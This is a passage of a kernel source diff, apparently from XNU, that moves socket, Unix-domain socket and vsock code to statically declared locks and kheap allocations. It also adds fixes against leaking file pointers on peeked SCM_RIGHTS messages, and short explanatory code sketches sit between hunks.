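A minimal sketch of the statically declared lock pattern adopted above; my_grp, my_mtx and my_protected_update are hypothetical names. The declarations replace the old lck_grp_attr_alloc_init() / lck_grp_alloc_init() / lck_mtx_alloc_init() boot-time sequence, so no init code or failure handling is needed:

    static LCK_GRP_DECLARE(my_grp, "my_subsystem");
    static LCK_MTX_DECLARE(my_mtx, &my_grp);

    static void
    my_protected_update(void)
    {
            lck_mtx_lock(&my_mtx);
            /* ... state guarded by my_mtx ... */
            lck_mtx_unlock(&my_mtx);
    }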
 
@@ -410,24 +408,6 @@ socketinit(void)
        PE_parse_boot_argn("socket_debug", &socket_debug,
            sizeof(socket_debug));
 
-       /*
-        * allocate lock group attribute and group for socket cache mutex
-        */
-       so_cache_mtx_grp_attr = lck_grp_attr_alloc_init();
-       so_cache_mtx_grp = lck_grp_alloc_init("so_cache",
-           so_cache_mtx_grp_attr);
-
-       /*
-        * allocate the lock attribute for socket cache mutex
-        */
-       so_cache_mtx_attr = lck_attr_alloc_init();
-
-       /* cached sockets mutex */
-       so_cache_mtx = lck_mtx_alloc_init(so_cache_mtx_grp, so_cache_mtx_attr);
-       if (so_cache_mtx == NULL) {
-               panic("%s: unable to allocate so_cache_mtx\n", __func__);
-               /* NOTREACHED */
-       }
        STAILQ_INIT(&so_cache_head);
 
        so_cache_zone_element_size = (vm_size_t)(sizeof(struct socket) + 4
@@ -442,7 +422,6 @@ socketinit(void)
        soextbkidlestat.so_xbkidle_rcvhiwat = SO_IDLE_BK_IDLE_RCV_HIWAT;
 
        in_pcbinit();
-       sflt_init();
        socket_tclass_init();
 #if MULTIPATH
        mp_pcbinit();
@@ -455,7 +434,7 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how)
        caddr_t temp;
        uintptr_t offset;
 
-       lck_mtx_lock(so_cache_mtx);
+       lck_mtx_lock(&so_cache_mtx);
 
        if (!STAILQ_EMPTY(&so_cache_head)) {
                VERIFY(cached_sock_count > 0);
@@ -465,14 +444,14 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how)
                STAILQ_NEXT((*so), so_cache_ent) = NULL;
 
                cached_sock_count--;
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
 
                temp = (*so)->so_saved_pcb;
                bzero((caddr_t)*so, sizeof(struct socket));
 
                (*so)->so_saved_pcb = temp;
        } else {
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
 
                *so = zalloc_flags(so_cache_zone, how | Z_ZERO);
 
@@ -502,12 +481,12 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how)
 static void
 cached_sock_free(struct socket *so)
 {
-       lck_mtx_lock(so_cache_mtx);
+       lck_mtx_lock(&so_cache_mtx);
 
        so_cache_time = net_uptime();
        if (++cached_sock_count > max_cached_sock_count) {
                --cached_sock_count;
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
                zfree(so_cache_zone, so);
        } else {
                if (so_cache_hw < cached_sock_count) {
@@ -517,7 +496,7 @@ cached_sock_free(struct socket *so)
                STAILQ_INSERT_TAIL(&so_cache_head, so, so_cache_ent);
 
                so->cache_timestamp = so_cache_time;
-               lck_mtx_unlock(so_cache_mtx);
+               lck_mtx_unlock(&so_cache_mtx);
        }
 }
 
@@ -574,7 +553,7 @@ so_cache_timer(void)
        int             n_freed = 0;
        boolean_t rc = FALSE;
 
-       lck_mtx_lock(so_cache_mtx);
+       lck_mtx_lock(&so_cache_mtx);
        so_cache_timeouts++;
        so_cache_time = net_uptime();
 
@@ -602,7 +581,7 @@ so_cache_timer(void)
                rc = TRUE;
        }
 
-       lck_mtx_unlock(so_cache_mtx);
+       lck_mtx_unlock(&so_cache_mtx);
        return rc;
 }
 
@@ -2510,9 +2489,7 @@ sosend(struct socket *so, struct sockaddr *addr, struct uio *uio,
                                if (error) {
                                        if (error == EJUSTRETURN) {
                                                error = 0;
-                                               clen = 0;
-                                               control = NULL;
-                                               top = NULL;
+                                               goto packet_consumed;
                                        }
                                        goto out_locked;
                                }
@@ -3055,6 +3032,20 @@ done:
        return error;
 }
 
+/*
+ * When peeking SCM_RIGHTS, the actual file descriptors are not yet created,
+ * so clear the data portion in order not to leak the file pointers.
+ */
+static void
+sopeek_scm_rights(struct mbuf *rights)
+{
+       struct cmsghdr *cm = mtod(rights, struct cmsghdr *);
+
+       if (cm->cmsg_type == SCM_RIGHTS) {
+               memset(cm + 1, 0, cm->cmsg_len - sizeof(*cm));
+       }
+}
+
 /*
  * Process one or more MT_CONTROL mbufs present before any data mbufs
  * in the first mbuf chain on the socket buffer.  If MSG_PEEK, we
@@ -3103,6 +3094,9 @@ soreceive_ctl(struct socket *so, struct mbuf **controlp, int flags,
                                        error = ENOBUFS;
                                        goto done;
                                }
+
+                               sopeek_scm_rights(*controlp);
+
                                controlp = &(*controlp)->m_next;
                        }
                        m = m->m_next;
@@ -3681,6 +3675,11 @@ dontblock:
                } else if (type == MT_OOBDATA) {
                        break;
                }
+
+               if (m->m_type != MT_OOBDATA && m->m_type != MT_DATA &&
+                   m->m_type != MT_HEADER) {
+                       break;
+               }
                /*
                 * Make sure to always set MSG_OOB event when getting
                 * out of band data inline.
@@ -8009,10 +8008,6 @@ socket_post_kev_msg_closed(struct socket *so)
                            &ev.ev_data, sizeof(ev));
                }
        }
-       if (socksa != NULL) {
-               FREE(socksa, M_SONAME);
-       }
-       if (peersa != NULL) {
-               FREE(peersa, M_SONAME);
-       }
+       FREE(socksa, M_SONAME);
+       FREE(peersa, M_SONAME);
 }
index e8272167695a5bd06f351ee45b3f1cc5178d2bf2..45e0f674ea53ac4db436b97743f92207baa8d12a 100644 (file)
@@ -166,8 +166,8 @@ static boolean_t uio_array_is_valid(struct uio **, u_int);
 static int recv_msg_array_is_valid(struct recv_msg_elem *, u_int);
 static int internalize_recv_msghdr_array(const void *, int, int,
     u_int, struct user_msghdr_x *, struct recv_msg_elem *);
-static u_int externalize_recv_msghdr_array(void *, int, int, u_int,
-    const struct user_msghdr_x *, struct recv_msg_elem *);
+static u_int externalize_recv_msghdr_array(struct proc *, struct socket *, void *, u_int,
+    struct user_msghdr_x *, struct recv_msg_elem *, int *);
 static struct recv_msg_elem *alloc_recv_msg_array(u_int count);
 static void free_recv_msg_array(struct recv_msg_elem *, u_int);
 
@@ -1307,7 +1307,7 @@ sendit(struct proc *p, struct socket *so, struct user_msghdr *mp, uio_t uiop,
                *retval = (int)(len - uio_resid(uiop));
        }
 bad:
-       if (to != NULL && want_free) {
+       if (want_free) {
                FREE(to, M_SONAME);
        }
 out:
@@ -1540,6 +1540,9 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval)
 
        KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0);
 
+       size_of_msghdr = IS_64BIT_PROCESS(p) ?
+           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
+
        if (uap->flags & MSG_SKIPCFIL) {
                error = EPERM;
                goto out;
@@ -1569,28 +1572,25 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval)
                uap->cnt = somaxsendmsgx;
        }
 
-       user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x),
-           M_TEMP, M_WAITOK | M_ZERO);
+       user_msg_x = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO);
        if (user_msg_x == NULL) {
-               DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
-       uiop = _MALLOC(uap->cnt * sizeof(struct uio *),
-           M_TEMP, M_WAITOK | M_ZERO);
+       uiop = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * sizeof(struct uio *), Z_WAITOK | Z_ZERO);
        if (uiop == NULL) {
-               DBG_PRINTF("%s _MALLOC() uiop failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc uiop failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
 
-       size_of_msghdr = IS_64BIT_PROCESS(p) ?
-           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
-
-       umsgp = _MALLOC(uap->cnt * size_of_msghdr,
-           M_TEMP, M_WAITOK | M_ZERO);
+       umsgp = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO);
        if (umsgp == NULL) {
-               printf("%s _MALLOC() user_msg_x failed\n", __func__);
+               printf("%s kheap_alloc umsgp failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
@@ -1720,16 +1720,14 @@ out:
        if (need_drop) {
                file_drop(uap->s);
        }
-       if (umsgp != NULL) {
-               _FREE(umsgp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr);
        if (uiop != NULL) {
                free_uio_array(uiop, uap->cnt);
-               _FREE(uiop, M_TEMP);
-       }
-       if (user_msg_x != NULL) {
-               _FREE(user_msg_x, M_TEMP);
+               kheap_free(KHEAP_TEMP, uiop,
+                   uap->cnt * sizeof(struct uio *));
        }
+       kheap_free(KHEAP_TEMP, user_msg_x,
+           uap->cnt * sizeof(struct user_msghdr_x));
 
        KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0);
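For reference, a minimal sketch of the KHEAP_TEMP allocation pattern used throughout this file; struct my_elem, count and my_temp_buffer_example are hypothetical names. The free side passes the same size as the allocation, and the unconditional kheap_free() calls above rely on a NULL pointer being tolerated, which is why the explicit NULL checks were dropped:

    struct my_elem {
            int value;
    };

    static int
    my_temp_buffer_example(u_int count)
    {
            struct my_elem *array;

            array = kheap_alloc(KHEAP_TEMP, count * sizeof(struct my_elem),
                Z_WAITOK | Z_ZERO);
            if (array == NULL) {
                    return ENOMEM;
            }

            /* ... use array ... */

            /* Free with the exact size that was allocated. */
            kheap_free(KHEAP_TEMP, array, count * sizeof(struct my_elem));
            return 0;
    }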
 
@@ -1965,9 +1963,7 @@ recvit(struct proc *p, int s, struct user_msghdr *mp, uio_t uiop,
                    &mp->msg_controllen, &mp->msg_flags, so);
        }
 out:
-       if (fromsa) {
-               FREE(fromsa, M_SONAME);
-       }
+       FREE(fromsa, M_SONAME);
        if (control) {
                m_freem(control);
        }
@@ -2199,6 +2195,9 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
 
        KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0);
 
+       size_of_msghdr = IS_64BIT_PROCESS(p) ?
+           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
+
        error = file_socket(uap->s, &so);
        if (error) {
                goto out;
@@ -2208,6 +2207,12 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                error = EBADF;
                goto out;
        }
+       /*
+        * Support only a subset of message flags
+        */
+       if (uap->flags & ~(MSG_PEEK | MSG_WAITALL | MSG_DONTWAIT | MSG_NEEDSA | MSG_NBIO)) {
+               error = EOPNOTSUPP;
+               goto out;
+       }
        /*
         * Input parameter range check
         */
@@ -2219,10 +2224,10 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                uap->cnt = somaxrecvmsgx;
        }
 
-       user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x),
-           M_TEMP, M_WAITOK | M_ZERO);
+       user_msg_x = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO);
        if (user_msg_x == NULL) {
-               DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
@@ -2232,12 +2237,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                error = ENOMEM;
                goto out;
        }
-       size_of_msghdr = IS_64BIT_PROCESS(p) ?
-           sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x);
 
-       umsgp = _MALLOC(uap->cnt * size_of_msghdr, M_TEMP, M_WAITOK | M_ZERO);
+       umsgp = kheap_alloc(KHEAP_TEMP,
+           uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO);
        if (umsgp == NULL) {
-               DBG_PRINTF("%s _MALLOC() umsgp failed\n", __func__);
+               DBG_PRINTF("%s kheap_alloc umsgp failed\n", __func__);
                error = ENOMEM;
                goto out;
        }
@@ -2318,7 +2322,7 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                            &recv_msg_elem->controlp : NULL;
 
                        error = so->so_proto->pr_usrreqs->pru_soreceive(so, psa,
-                           auio, (struct mbuf **)0, controlp, &flags);
+                           auio, (struct mbuf **)NULL, controlp, &flags);
                        if (error) {
                                break;
                        }
@@ -2326,17 +2330,18 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                         * We have some data
                         */
                        recv_msg_elem->which |= SOCK_MSG_DATA;
+                       /*
+                        * Set the messages flags for this packet
+                        */
+                       flags &= ~MSG_DONTWAIT;
+                       recv_msg_elem->flags = flags;
                        /*
                         * Stop on partial copy
                         */
-                       if (flags & (MSG_RCVMORE | MSG_TRUNC)) {
+                       if (recv_msg_elem->flags & (MSG_RCVMORE | MSG_TRUNC)) {
                                break;
                        }
                }
-               if ((uap->flags & MSG_DONTWAIT) == 0) {
-                       flags &= ~MSG_DONTWAIT;
-               }
-               uap->flags = flags;
        }
 
        len_after = recv_msg_array_resid(recv_msg_array, uap->cnt);
@@ -2350,9 +2355,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
                }
        }
 
-       uiocnt = externalize_recv_msghdr_array(umsgp,
-           IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32,
-           UIO_READ, uap->cnt, user_msg_x, recv_msg_array);
+       uiocnt = externalize_recv_msghdr_array(p, so, umsgp,
+           uap->cnt, user_msg_x, recv_msg_array, &error);
+       if (error != 0) {
+               goto out;
+       }
 
        error = copyout(umsgp, uap->msgp, uap->cnt * size_of_msghdr);
        if (error) {
@@ -2361,40 +2368,14 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval)
        }
        *retval = (int)(uiocnt);
 
-       for (i = 0; i < uap->cnt; i++) {
-               struct user_msghdr_x *mp = user_msg_x + i;
-               struct recv_msg_elem *recv_msg_elem = recv_msg_array + i;
-               struct sockaddr *fromsa = recv_msg_elem->psa;
-
-               if (mp->msg_name) {
-                       error = copyout_sa(fromsa, mp->msg_name,
-                           &mp->msg_namelen);
-                       if (error) {
-                               goto out;
-                       }
-               }
-               if (mp->msg_control) {
-                       error = copyout_control(p, recv_msg_elem->controlp,
-                           mp->msg_control, &mp->msg_controllen,
-                           &mp->msg_flags, so);
-                       if (error) {
-                               goto out;
-                       }
-               }
-       }
 out:
        if (need_drop) {
                file_drop(uap->s);
        }
-       if (umsgp != NULL) {
-               _FREE(umsgp, M_TEMP);
-       }
-       if (recv_msg_array != NULL) {
-               free_recv_msg_array(recv_msg_array, uap->cnt);
-       }
-       if (user_msg_x != NULL) {
-               _FREE(user_msg_x, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr);
+       free_recv_msg_array(recv_msg_array, uap->cnt);
+       kheap_free(KHEAP_TEMP, user_msg_x,
+           uap->cnt * sizeof(struct user_msghdr_x));
 
        KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0);
 
@@ -2633,9 +2614,7 @@ getsockname(__unused struct proc *p, struct getsockname_args *uap,
 gotnothing:
        error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t));
 bad:
-       if (sa) {
-               FREE(sa, M_SONAME);
-       }
+       FREE(sa, M_SONAME);
 out:
        file_drop(uap->fdes);
        return error;
@@ -2722,9 +2701,7 @@ getpeername(__unused struct proc *p, struct getpeername_args *uap,
 gotnothing:
        error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t));
 bad:
-       if (sa) {
-               FREE(sa, M_SONAME);
-       }
+       FREE(sa, M_SONAME);
 out:
        file_drop(uap->fdes);
        return error;
@@ -3092,48 +3069,60 @@ externalize_user_msghdr_array(void *dst, int spacetype, int direction,
 }
 
 u_int
-externalize_recv_msghdr_array(void *dst, int spacetype, int direction,
-    u_int count, const struct user_msghdr_x *src,
-    struct recv_msg_elem *recv_msg_array)
+externalize_recv_msghdr_array(struct proc *p, struct socket *so, void *dst,
+    u_int count, struct user_msghdr_x *src,
+    struct recv_msg_elem *recv_msg_array, int *ret_error)
 {
        u_int i;
-       int seenlast = 0;
        u_int retcnt = 0;
+       int spacetype = IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32;
+
+       *ret_error = 0;
 
        for (i = 0; i < count; i++) {
-               const struct user_msghdr_x *user_msg = src + i;
+               struct user_msghdr_x *user_msg = src + i;
                struct recv_msg_elem *recv_msg_elem = recv_msg_array + i;
-               user_ssize_t len;
+               user_ssize_t len = 0;
+               int error;
 
                len = user_msg->msg_datalen - uio_resid(recv_msg_elem->uio);
 
-               if (direction == UIO_READ) {
-                       if ((recv_msg_elem->which & SOCK_MSG_DATA) == 0) {
-                               seenlast = 1;
+               if ((recv_msg_elem->which & SOCK_MSG_DATA)) {
+                       retcnt++;
+
+                       if (recv_msg_elem->which & SOCK_MSG_SA) {
+                               error = copyout_sa(recv_msg_elem->psa, user_msg->msg_name,
+                                   &user_msg->msg_namelen);
+                               if (error != 0) {
+                                       *ret_error = error;
+                                       return 0;
+                               }
                        }
-               } else {
-                       if (user_msg->msg_datalen != 0 && len == 0) {
-                               seenlast = 1;
+                       if (recv_msg_elem->which & SOCK_MSG_CONTROL) {
+                               error = copyout_control(p, recv_msg_elem->controlp,
+                                   user_msg->msg_control, &user_msg->msg_controllen,
+                                   &recv_msg_elem->flags, so);
+                               if (error != 0) {
+                                       *ret_error = error;
+                                       return 0;
+                               }
                        }
                }
 
-               if (seenlast == 0) {
-                       retcnt++;
-               }
-
                if (spacetype == UIO_USERSPACE64) {
-                       struct user64_msghdr_x *msghdr64;
-
-                       msghdr64 = ((struct user64_msghdr_x *)dst) + i;
+                       struct user64_msghdr_x *msghdr64 = ((struct user64_msghdr_x *)dst) + i;
 
-                       msghdr64->msg_flags = user_msg->msg_flags;
+                       msghdr64->msg_namelen = user_msg->msg_namelen;
+                       msghdr64->msg_controllen = user_msg->msg_controllen;
+                       msghdr64->msg_flags = recv_msg_elem->flags;
                        msghdr64->msg_datalen = len;
                } else {
-                       struct user32_msghdr_x *msghdr32;
-
-                       msghdr32 = ((struct user32_msghdr_x *)dst) + i;
+                       struct user32_msghdr_x *msghdr32 = ((struct user32_msghdr_x *)dst) + i;
 
-                       msghdr32->msg_flags = user_msg->msg_flags;
+                       msghdr32->msg_namelen = user_msg->msg_namelen;
+                       msghdr32->msg_controllen = user_msg->msg_controllen;
+                       msghdr32->msg_flags = recv_msg_elem->flags;
                        msghdr32->msg_datalen = (user32_size_t)len;
                }
        }
@@ -3201,33 +3190,29 @@ uio_array_is_valid(struct uio **uiop, u_int count)
 struct recv_msg_elem *
 alloc_recv_msg_array(u_int count)
 {
-       struct recv_msg_elem *recv_msg_array;
-
-       recv_msg_array = _MALLOC(count * sizeof(struct recv_msg_elem),
-           M_TEMP, M_WAITOK | M_ZERO);
-
-       return recv_msg_array;
+       return kheap_alloc(KHEAP_TEMP,
+                  count * sizeof(struct recv_msg_elem), Z_WAITOK | Z_ZERO);
 }
 
 void
 free_recv_msg_array(struct recv_msg_elem *recv_msg_array, u_int count)
 {
-       u_int i;
-
-       for (i = 0; i < count; i++) {
+       if (recv_msg_array == NULL) {
+               return;
+       }
+       for (uint32_t i = 0; i < count; i++) {
                struct recv_msg_elem *recv_msg_elem = recv_msg_array + i;
 
                if (recv_msg_elem->uio != NULL) {
                        uio_free(recv_msg_elem->uio);
                }
-               if (recv_msg_elem->psa != NULL) {
-                       _FREE(recv_msg_elem->psa, M_TEMP);
-               }
+               _FREE(recv_msg_elem->psa, M_TEMP);
                if (recv_msg_elem->controlp != NULL) {
                        m_freem(recv_msg_elem->controlp);
                }
        }
-       _FREE(recv_msg_array, M_TEMP);
+       kheap_free(KHEAP_TEMP, recv_msg_array,
+           count * sizeof(struct recv_msg_elem));
 }
 
 
index c363f4cf391473e9932acb2cbf3dbd147e7942ad..5e45f89ee12ee9ecf76f49d61223aa94428b173e 100644 (file)
@@ -110,14 +110,14 @@ ZONE_DECLARE(unp_zone, "unpzone", sizeof(struct unpcb), ZC_NONE);
 static  unp_gen_t unp_gencnt;
 static  u_int unp_count;
 
-static  lck_attr_t             *unp_mtx_attr;
-static  lck_grp_t              *unp_mtx_grp;
-static  lck_grp_attr_t         *unp_mtx_grp_attr;
-static  lck_rw_t                unp_list_mtx;
-
-static  lck_mtx_t               unp_disconnect_lock;
-static  lck_mtx_t               unp_connect_lock;
-static  lck_mtx_t               uipc_lock;
+static  LCK_ATTR_DECLARE(unp_mtx_attr, 0, 0);
+static  LCK_GRP_DECLARE(unp_mtx_grp, "unp_list");
+static  LCK_RW_DECLARE_ATTR(unp_list_mtx, &unp_mtx_grp, &unp_mtx_attr);
+
+static  LCK_MTX_DECLARE_ATTR(unp_disconnect_lock, &unp_mtx_grp, &unp_mtx_attr);
+static  LCK_MTX_DECLARE_ATTR(unp_connect_lock, &unp_mtx_grp, &unp_mtx_attr);
+static  LCK_MTX_DECLARE_ATTR(uipc_lock, &unp_mtx_grp, &unp_mtx_attr);
+
 static  u_int                   disconnect_in_progress;
 
 static struct unp_head unp_shead, unp_dhead;
@@ -917,8 +917,7 @@ unp_attach(struct socket *so)
        }
        bzero(unp, sizeof(*unp));
 
-       lck_mtx_init(&unp->unp_mtx,
-           unp_mtx_grp, unp_mtx_attr);
+       lck_mtx_init(&unp->unp_mtx, &unp_mtx_grp, &unp_mtx_attr);
 
        lck_rw_lock_exclusive(&unp_list_mtx);
        LIST_INIT(&unp->unp_refs);
@@ -1743,8 +1742,8 @@ unp_pcblist SYSCTL_HANDLER_ARGS
                return 0;
        }
 
-       MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list),
-           M_TEMP, M_WAITOK);
+       size_t unp_list_len = n * sizeof(*unp_list);
+       unp_list = kheap_alloc(KHEAP_TEMP, unp_list_len, Z_WAITOK);
        if (unp_list == 0) {
                lck_rw_done(&unp_list_mtx);
                return ENOMEM;
@@ -1801,7 +1800,7 @@ unp_pcblist SYSCTL_HANDLER_ARGS
                xug.xug_count = unp_count;
                error = SYSCTL_OUT(req, &xug, sizeof(xug));
        }
-       FREE(unp_list, M_TEMP);
+       kheap_free(KHEAP_TEMP, unp_list, unp_list_len);
        lck_rw_done(&unp_list_mtx);
        return error;
 }
@@ -1872,8 +1871,8 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS
                return 0;
        }
 
-       MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list),
-           M_TEMP, M_WAITOK);
+       size_t unp_list_size = n * sizeof(*unp_list);
+       unp_list = kheap_alloc(KHEAP_TEMP, unp_list_size, Z_WAITOK);
        if (unp_list == 0) {
                lck_rw_done(&unp_list_mtx);
                return ENOMEM;
@@ -1954,7 +1953,7 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS
                xug.xug_count = unp_count;
                error = SYSCTL_OUT(req, &xug, sizeof(xug));
        }
-       FREE(unp_list, M_TEMP);
+       kheap_free(KHEAP_TEMP, unp_list, unp_list_size);
        lck_rw_done(&unp_list_mtx);
        return error;
 }
@@ -2156,8 +2155,8 @@ unp_externalize(struct mbuf *rights)
        int newfds = (cm->cmsg_len - sizeof(*cm)) / sizeof(int);
        int f, error = 0;
 
-       MALLOC(fileproc_l, struct fileproc **,
-           newfds * sizeof(struct fileproc *), M_TEMP, M_WAITOK);
+       fileproc_l = kheap_alloc(KHEAP_TEMP,
+           newfds * sizeof(struct fileproc *), Z_WAITOK);
        if (fileproc_l == NULL) {
                error = ENOMEM;
                goto discard;
@@ -2222,9 +2221,8 @@ unp_externalize(struct mbuf *rights)
        }
 
 discard:
-       if (fileproc_l != NULL) {
-               FREE(fileproc_l, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, fileproc_l,
+           newfds * sizeof(struct fileproc *));
        if (error) {
                for (i = 0; i < newfds; i++) {
                        unp_discard(*rp, p);
@@ -2240,20 +2238,6 @@ unp_init(void)
        _CASSERT(UIPC_MAX_CMSG_FD >= (MCLBYTES / sizeof(int)));
        LIST_INIT(&unp_dhead);
        LIST_INIT(&unp_shead);
-
-       /*
-        * allocate lock group attribute and group for udp pcb mutexes
-        */
-       unp_mtx_grp_attr = lck_grp_attr_alloc_init();
-
-       unp_mtx_grp = lck_grp_alloc_init("unp_list", unp_mtx_grp_attr);
-
-       unp_mtx_attr = lck_attr_alloc_init();
-
-       lck_mtx_init(&uipc_lock, unp_mtx_grp, unp_mtx_attr);
-       lck_rw_init(&unp_list_mtx, unp_mtx_grp, unp_mtx_attr);
-       lck_mtx_init(&unp_disconnect_lock, unp_mtx_grp, unp_mtx_attr);
-       lck_mtx_init(&unp_connect_lock, unp_mtx_grp, unp_mtx_attr);
 }
 
 #ifndef MIN
@@ -2482,8 +2466,8 @@ unp_gc(void)
         *
         * 91/09/19, bsy@cs.cmu.edu
         */
-       MALLOC(extra_ref, struct fileglob **, nfiles * sizeof(struct fileglob *),
-           M_TEMP, M_WAITOK);
+       size_t extra_ref_size = nfiles * sizeof(struct fileglob *);
+       extra_ref = kheap_alloc(KHEAP_TEMP, extra_ref_size, Z_WAITOK);
        if (extra_ref == NULL) {
                goto bail;
        }
@@ -2539,7 +2523,8 @@ unp_gc(void)
                fg_drop(PROC_NULL, *fpp);
        }
 
-       FREE(extra_ref, M_TEMP);
+       kheap_free(KHEAP_TEMP, extra_ref, extra_ref_size);
+
 bail:
        lck_mtx_lock(&uipc_lock);
        unp_gcing = 0;
@@ -2708,7 +2693,7 @@ unp_unlock(struct socket *so, int refcount, void * lr)
 
                lck_mtx_unlock(mutex_held);
 
-               lck_mtx_destroy(&unp->unp_mtx, unp_mtx_grp);
+               lck_mtx_destroy(&unp->unp_mtx, &unp_mtx_grp);
                zfree(unp_zone, unp);
 
                unp_gc();
index ae118349db5a404810c8050499b189c2b879b30a..2f3e69a71990062b8ea796e01bf1c871b3153e88 100644 (file)
@@ -50,6 +50,7 @@
 static struct vsock_transport * _Atomic the_vsock_transport = NULL;
 static ZONE_DECLARE(vsockpcb_zone, "vsockpcbzone",
     sizeof(struct vsockpcb), ZC_NONE);
+static LCK_GRP_DECLARE(vsock_lock_grp, "vsock");
 static struct vsockpcbinfo vsockinfo;
 
 static uint32_t vsock_sendspace = VSOCK_MAX_PACKET_SIZE * 8;
@@ -70,7 +71,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst)
        struct vsockpcb *match = NULL;
        struct vsockpcb *pcb = NULL;
 
-       lck_rw_lock_shared(vsockinfo.bound_lock);
+       lck_rw_lock_shared(&vsockinfo.bound_lock);
        LIST_FOREACH(pcb, &vsockinfo.bound, bound) {
                // Source cid and port must match. Only destination port must match. (Allows for a changing CID during migration)
                socket_lock(pcb->so, 1);
@@ -89,7 +90,7 @@ vsock_get_matching_pcb(struct vsock_address src, struct vsock_address dst)
                socket_lock(match->so, 1);
                preferred = match;
        }
-       lck_rw_done(vsockinfo.bound_lock);
+       lck_rw_done(&vsockinfo.bound_lock);
 
        return preferred;
 }
@@ -111,7 +112,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo
        struct vsockpcb *pcb_match = NULL;
 
        socket_unlock(pcb->so, 0);
-       lck_rw_lock_exclusive(vsockinfo.bound_lock);
+       lck_rw_lock_exclusive(&vsockinfo.bound_lock);
        LIST_FOREACH(pcb_match, &vsockinfo.bound, bound) {
                socket_lock(pcb_match->so, 1);
                if (pcb == pcb_match ||
@@ -130,7 +131,7 @@ vsock_bind_address_if_free(struct vsockpcb *pcb, uint32_t local_cid, uint32_t lo
                pcb->remote_address = (struct vsock_address) { .cid = remote_cid, .port = remote_port };
                LIST_INSERT_HEAD(&vsockinfo.bound, pcb, bound);
        }
-       lck_rw_done(vsockinfo.bound_lock);
+       lck_rw_done(&vsockinfo.bound_lock);
 
        return taken ? EADDRINUSE : 0;
 }
@@ -225,10 +226,10 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked)
 
        if (!is_locked) {
                socket_unlock(pcb->so, 0);
-               lck_rw_lock_exclusive(vsockinfo.bound_lock);
+               lck_rw_lock_exclusive(&vsockinfo.bound_lock);
                socket_lock(pcb->so, 0);
                if (!pcb->bound.le_prev) {
-                       lck_rw_done(vsockinfo.bound_lock);
+                       lck_rw_done(&vsockinfo.bound_lock);
                        return;
                }
        }
@@ -238,7 +239,7 @@ vsock_unbind_pcb(struct vsockpcb *pcb, bool is_locked)
        pcb->bound.le_prev = NULL;
 
        if (!is_locked) {
-               lck_rw_done(vsockinfo.bound_lock);
+               lck_rw_done(&vsockinfo.bound_lock);
        }
 }
 
@@ -250,12 +251,12 @@ vsock_new_sockaddr(struct vsock_address *address)
        }
 
        struct sockaddr_vm *addr;
-       MALLOC(addr, struct sockaddr_vm *, sizeof(*addr), M_SONAME, M_WAITOK);
